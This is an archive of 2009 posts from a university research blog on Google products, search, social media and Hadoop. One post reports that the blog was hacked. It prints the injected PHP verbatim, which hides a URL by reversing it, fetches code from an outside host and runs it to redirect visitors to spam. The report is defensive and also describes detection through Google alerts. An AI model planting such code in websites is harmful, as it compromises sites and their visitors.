UMBC ebiquity
Google

Archive for the 'Google' Category

Google Reader gets more social

July 16th, 2009, by Tim Finin, posted in Google, Social media

The most frequent complaint about Facebook I’ve seen is that it provides a button to show you like an item, but not one for dislike. Google Reader recently added new social features, including the ability for users to mark a post as liked, but it also doesn’t allow you to indicate your dislike. You can unlike an item that you previously had liked, but that just gets you back to a neutral stance.

It’s probably a prudent choice, aimed at keeping things civil. But there are two schools of thought about the old adage “If you don’t have anything nice to say about someone …”, one of which ends with “come sit next to me.”

The first time you like a post on Google Reader it warns you that it’s a public act. Indeed, clicking on the “N people liked this” link at the top of a post in Reader shows you the Google names of readers who liked it. You can click through to their Google profiles or to see a list of other liked and shared items. Public indeed! At least on Facebook your likes are visible only to people who can see the corresponding item.

I think Google Reader’s new social features look like they might be useful, but time will tell.

Google is from Mars, Facebook is from Venus

June 23rd, 2009, by Tim Finin, posted in Google, Social media

Wired has an interesting article on Facebook vs. Google, Great Wall of Facebook: The Social Network’s Plan to Dominate the Internet — and Keep Google Out.

“Today, the Google-Facebook rivalry isn’t just going strong, it has evolved into a full-blown battle over the future of the Internet—its structure, design, and utility. For the last decade or so, the Web has been defined by Google’s algorithms—rigorous and efficient equations that parse practically every byte of online activity to build a dispassionate atlas of the online world. Facebook CEO Mark Zuckerberg envisions a more personalized, humanized Web, where our network of friends, colleagues, peers, and family is our primary source of information, just as it is offline. In Zuckerberg’s vision, users will query this “social graph” to find a doctor, the best camera, or someone to hire—rather than tapping the cold mathematics of a Google search. It is a complete rethinking of how we navigate the online world, one that places Facebook right at the center. In other words, right where Google is now.”

This is definitely a David and Goliath match, what with Facebook not having turned a profit yet. The article does a good job of pointing out how their services are different and complement one another.

At the risk of evoking discredited stereotypes, maybe Google is from Mars and Facebook is from Venus.

BlindSearch evaluates Google, Bing and Yahoo search engines

June 7th, 2009, by Tim Finin, posted in Google, sEARCH, Web

Who’s got the best basic web search engine? One way to approach that question is to conduct an experiment in which subjects rank the results returned by several engines without knowing which is which.

BlindSearch is a simple and neat site that collects ‘objective’ opinions on search quality by showing query results from Google, Yahoo and Bing side by side without identifying which is which and inviting you to select the best.

“Type in a search query above, hit search then vote for the column which you believe best matches your query. The columns are randomised with every query.

The goal of this site is simple, we want to see what happens when you remove the branding from search engines. How differently will you perceive the results?”


As of this writing there have been 1679 votes for preferred results, with Google getting 39%, Bing 39% and Yahoo 22%.

update 2:14pm edt 6/7: Google: 45%, Bing: 32%, Yahoo: 22% | 11,130 votes

Google Chrome for Linux and Mac

June 5th, 2009, by Tim Finin, posted in Google, sEARCH, Web

How’s this for truth in advertising? The Chromium blog announces early developer versions of Google Chrome for Mac OS X and Linux, but warns people not to try them, in a post titled Danger: Mac and Linux builds available.

“In order to get more feedback from developers, we have early developer channel versions of Google Chrome for Mac OS X and Linux, but whatever you do, please DON’T DOWNLOAD THEM! Unless of course you are a developer or take great pleasure in incomplete, unpredictable, and potentially crashing software. How incomplete? So incomplete that, among other things, you won’t yet be able to view YouTube videos, change your privacy settings, set your default search provider, or even print.”

Of course, they know that this will make trying them irresistible to some of us. If that includes you, go get the Mac or Linux version.

Bing vs. Google, side by side comparison

June 1st, 2009, by Tim Finin, posted in Google, sEARCH, Security, Semantic Web, Social media

Microsoft’s new Bing search engine is getting a lot of interest. Glenn McDonald posts about a nice side-by-side Bing vs Google comparator that he developed. It makes it easy to compare how the two services do on a range of different types of searches. Here are the ones that Glenn said he found useful in developing his initial opinion.

I sense from some of these queries that he is probing the systems where an advanced search engine can exploit a little bit of semantic knowledge. For example, recognizing that a user’s query “boston to asheville” matches a common pattern “[location] to [location]”, and that she is probably interested in information about how to travel from the first location to the second. It seems like Google has been working on adding more such patterns, at least for the low-hanging fruit.
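As a rough illustration of the kind of pattern matching described above, here is a minimal Python sketch. The regular expression, the function name `parse_travel_query` and the returned dictionary are assumptions made up for this example; nothing here reflects how Google or Bing actually interpret queries.

```python
import re

# Hypothetical pattern: "<origin> to <destination>", e.g. "boston to asheville".
TRAVEL_PATTERN = re.compile(
    r"^\s*(?P<origin>.+?)\s+to\s+(?P<destination>.+?)\s*$",
    re.IGNORECASE,
)


def parse_travel_query(query):
    """Return origin and destination if the query fits the pattern, else None."""
    match = TRAVEL_PATTERN.match(query)
    if match is None:
        return None
    return {
        "origin": match.group("origin"),
        "destination": match.group("destination"),
    }


print(parse_travel_query("boston to asheville"))
print(parse_travel_query("semantic web"))
```

A purely syntactic match like this would also fire on a query such as “how to cook”, so a real system would presumably need some semantic knowledge as well, for instance a check that both parts name known places.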

Of course, if everyone hits this site it may get throttled or blocked by either or both of the search engines. @Glenn, would you be willing to share your code?

(spotted on hacker news)

Google Wave as a new communication model

May 28th, 2009, by Tim Finin, posted in Agents, Google, Semantic Web, Social media

Google Wave looks interesting. Google describes it as “a new tool for communication and collaboration on the web” and it’s a funny mix of email, instant messaging, wikis, and Facebook wall interactions. Or maybe IRC for the new century. This is from a post, Went Walkabout. Brought back Google Wave, on the Google blog.

“A “wave” is equal parts conversation and document, where people can communicate and work together with richly formatted text, photos, videos, maps, and more. Here’s how it works: In Google Wave you create a wave and add people to it. Everyone on your wave can use richly formatted text, photos, gadgets, and even feeds from other sources on the web. They can insert a reply or edit the wave directly. It’s concurrent rich-text editing, where you see on your screen nearly instantly what your fellow collaborators are typing in your wave. That means Google Wave is just as well suited for quick messages as for persistent content — it allows for both collaboration and communication. You can also use “playback” to rewind the wave and see how it evolved.”

Google Wave is not available yet, but you can sign up to be notified when it’s launched.

Here’s a random thought. Our models for communication in multiagent systems (e.g., KQML and FIPA) were informed by, if not based on, email and, to a lesser degree, IM. If Wave is a useful new communication model for humans, does it have a counterpart for software agents? If so, I suspect that ideas from the Semantic Web will be useful to provide “rich content” for agents.

For more views, see posts by O’Reilly, TechCrunch, BusinessWeek and Gabor Cselle.

Ebiquity Google alert tripwires triggered

May 21st, 2009, by Tim Finin, posted in Ebiquity, Google, Security, splog

Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like http://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
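The reversed-URL trick is easy to undo. The short Python sketch below mirrors PHP’s `strrev()` with a slice; the helper name `strrev` and the variable names are chosen here for illustration, and the string is copied from the injected code above.

```python
# PHP's strrev() reverses a string; a Python slice with step -1 does the same.
obfuscated = "txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"  # from the injected code


def strrev(text):
    """Return the characters of text in reverse order."""
    return text[::-1]


decoded = strrev(obfuscated)
print(decoded)
```

Reversing the string hides the address from a simple text search for “http://”, which is presumably why the attacker bothered.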

We discovered the problem through a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

  • adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
  • viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
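For anyone who wants to set up similar tripwires for their own site, the alert queries listed above can be assembled mechanically. This is only a sketch: the function name `build_alert_query` is invented here, and the resulting string still has to be entered into Google Alerts by hand.

```python
def build_alert_query(terms, site):
    """Join spam-related terms with OR and restrict the search to one site."""
    return " OR ".join(terms) + " site:" + site


# Term list copied from the second alert above.
pharma_terms = ["viagra", "cialis", "levitra", "Phentermine", "Xanax"]
print(build_alert_query(pharma_terms, "ebiquity.umbc.edu"))
```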


The results of this Google search reveal many compromised blogs from the .edu domain.

Google supports RDFa and Microformats

May 12th, 2009, by Tim Finin, posted in Google, RDF, Semantic Web

Google has announced that it will begin to recognize structured information encoded as metadata in either RDFa or microformats, and will use the metadata in search result snippets for reviews and people.

“Structured data makes the web a better place. It also helps Google better understand and present your page in search results. … Google’s first use of this data will be in search results snippets for two kinds of objects: Reviews and People. Providing more detail in search results helps users to understand the value of your pages. When users get more information showing how your page is relevant to their search, they’re more likely to click through to see the full page. … At Google, we believe in openness, so we are using two open standards to allow you to annotate structured data on your site: microformats and RDFa. Both standards allow markup of information on your pages.”

This is a case where Google is following Yahoo, which announced more general support for RDFa and microformats last fall in its SearchMonkey.

We expect that this is work in progress. While it’s great that Google is supporting RDFa annotations, they are asking people to start with the new RDF vocabulary defined at their site http://www.data-vocabulary.org/ rather than reusing or integrating with existing, widely used vocabularies. Let’s hope that they embrace the LOD vision in the near future.

Storms on Planet Social Media Research

May 7th, 2009, by Tim Finin, posted in Google, Social media, splog

We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.

Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. (I was able to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)

We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to Feedburner.

My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.

One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.

So, my guess is that Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which are the motivation for most splogs.

If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.

By the way, we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us at planet-smr at cs.umbc.edu.

update 5/8: We’ve identified and solved the problem, thanks to Google Feedburner ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the Feedburner IP address in the server’s /etc/hosts table. I think we added it when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.
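A forgotten /etc/hosts entry like this one is easy to audit for. The sketch below is a hypothetical helper, not something we actually ran: the function name `find_pinned_hosts`, the sample hostname and the sample address (taken from a range reserved for documentation) are all made up for illustration.

```python
def find_pinned_hosts(hosts_text, hostname):
    """Return the IP addresses that a hosts file pins to the given hostname."""
    pinned = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and surrounding space
        if not line:
            continue  # skip blank and comment-only lines
        fields = line.split()
        ip_address, names = fields[0], fields[1:]
        if hostname.lower() in (name.lower() for name in names):
            pinned.append(ip_address)
    return pinned


# Made-up sample contents standing in for a real /etc/hosts file.
sample_hosts = """
127.0.0.1   localhost
192.0.2.10  feeds.example.org   # temporary fix, remove later
"""
print(find_pinned_hosts(sample_hosts, "feeds.example.org"))
```

On a real server one would read the text from /etc/hosts and compare any pinned address against a direct DNS lookup (for example with `dig`), since the system resolver usually consults the hosts file first.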

Google flu trends for Mexico

April 30th, 2009, by Tim Finin, posted in Google, Social media

Google has produced a special Mexico Flu Trends page to aggregate flu-related search queries from users in Mexico and various states within Mexico.

“We’ve created experimental estimates of flu activity in Mexico using aggregated search data. Unlike Google Flu Trends for U.S., this data has not been validated against confirmed cases of flu. After conferring with US and Mexican health officials, we’ve decided to share these initial results to provide additional information on the evolving epidemic.”

An article in the New York Times, To Aid Mexico, Google Expands Flu Tracking, quotes one expert on the limitations of the Google data:

Dr. Henry L. Niman, a biochemist in Pittsburgh who runs Recombinomics, a Web site that tracks the genetics of flu cases worldwide, said that Google’s service appeared to provide only limited advance warning. “I am not saying that it is not useful. It probably works to complement other sources of surveillance and data,” he said.

Google flu trends: Web searches as sensors

April 26th, 2009, by Tim Finin, posted in Google, sEARCH, Semantic Web, Social media

Google has had a special “flu trends” site up for many months that provides “up-to-date estimates of flu activity in the United States based on aggregated search queries.”

They have found that the number of people searching for flu-related topics is a leading indicator of reports of how many people actually have flu symptoms. They believe that this metric “may indicate flu activity up to two weeks ahead of traditional flu surveillance systems”.

So, is Google magic? The explanation for why changes in the level of flu searches precede changes in the reported level of flu symptoms is more mundane.

“So why bother with estimates from aggregated search queries? It turns out that traditional flu surveillance systems take 1-2 weeks to collect and release surveillance data, but Google search queries can be automatically counted very quickly. By making our flu estimates available each day, Google Flu Trends may provide an early-warning system for outbreaks of influenza.”
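One way to make the “leading indicator” idea concrete is a lagged correlation: shift one weekly series against the other and see which shift lines them up best. The Python sketch below uses toy numbers invented for illustration, in which the reports simply repeat the searches two weeks later. It is not the method from the Nature paper, and the function names are assumptions.

```python
from math import sqrt


def pearson(xs, ys):
    """Pearson correlation coefficient of two equal-length sequences."""
    n = len(xs)
    mean_x, mean_y = sum(xs) / n, sum(ys) / n
    cov = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    var_x = sum((x - mean_x) ** 2 for x in xs)
    var_y = sum((y - mean_y) ** 2 for y in ys)
    return cov / sqrt(var_x * var_y)


def best_lead(searches, reports, max_lag):
    """Return the lag in weeks with the highest correlation, plus all scores."""
    scores = {}
    for lag in range(max_lag + 1):
        # Pair searches in week t with reports in week t + lag.
        xs = searches[: len(searches) - lag]
        ys = reports[lag:]
        scores[lag] = pearson(xs, ys)
    return max(scores, key=scores.get), scores


# Toy weekly counts, invented for this example only.
searches = [1, 2, 4, 8, 6, 3, 2, 1, 1, 1]
reports = [1, 1, 1, 2, 4, 8, 6, 3, 2, 1]

lag, scores = best_lead(searches, reports, 4)
print("best lag in weeks:", lag)
```

With real data the peak would be far less clean, and a high correlation at some lag says nothing about whether the relationship will hold in an unusual season.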

You can get the details in a recent article in Nature:

J. Ginsberg, M. Mohebbi, R. Patel, L. Brammer, M. Smolinski and L. Brilliant, Detecting influenza epidemics using search engine query data, Nature 457, 1012-1014 (19 February 2009).

Of course, such leading indicators may not correlate well if there is a “black swan” flu epidemic or even if there is an unfounded fear of one. Sometimes the crowds are wise, but often not. Remember when we all thought technology stocks, er, real estate was a good thing to invest in?

The Google site also allows you to look at the data by state.



Cloudera offers a simpler Hadoop distribution

March 18th, 2009, by Tim Finin, posted in cloud computing, Google, High performance computing, MC2, Multicore Computation Center, Semantic Web, Social media

We are early in the era of big data (including social and/or semantic) and more and more of us need the tools to handle it. Monday’s NYT had a story, Hadoop, a Free Software Program, Finds Uses Beyond Search, on Hadoop and Cloudera, a new startup that is offering its own Hadoop distribution that is designed to be easier to install and configure.

“In the span of just a couple of years, Hadoop, a free software program named after a toy elephant, has taken over some of the world’s biggest Web sites. It controls the top search engines and determines the ads displayed next to the results. It decides what people see on Yahoo’s homepage and finds long-lost friends on Facebook.”

Three top engineers from Google, Yahoo and Facebook, along with a former executive from Oracle, are betting it will. They announced a start-up Monday called Cloudera, based in Burlingame, Calif., that will try to bring Hadoop’s capabilities to industries as far afield as genomics, retailing and finance. The company has just released its own version of Hadoop. The software remains free, but Cloudera hopes to make money selling support and consulting services for the software. It has only a few customers, but it wants to attract biotech, oil and gas, retail and insurance customers to the idea of making more out of their information for less.

Cloudera’s distribution, currently based on Hadoop v0.18.3, uses RPM and comes with a Web-based configuration aid. The company also offers some free basic training in MapReduce concepts, using Hadoop, developing appropriate algorithms and using Hive.
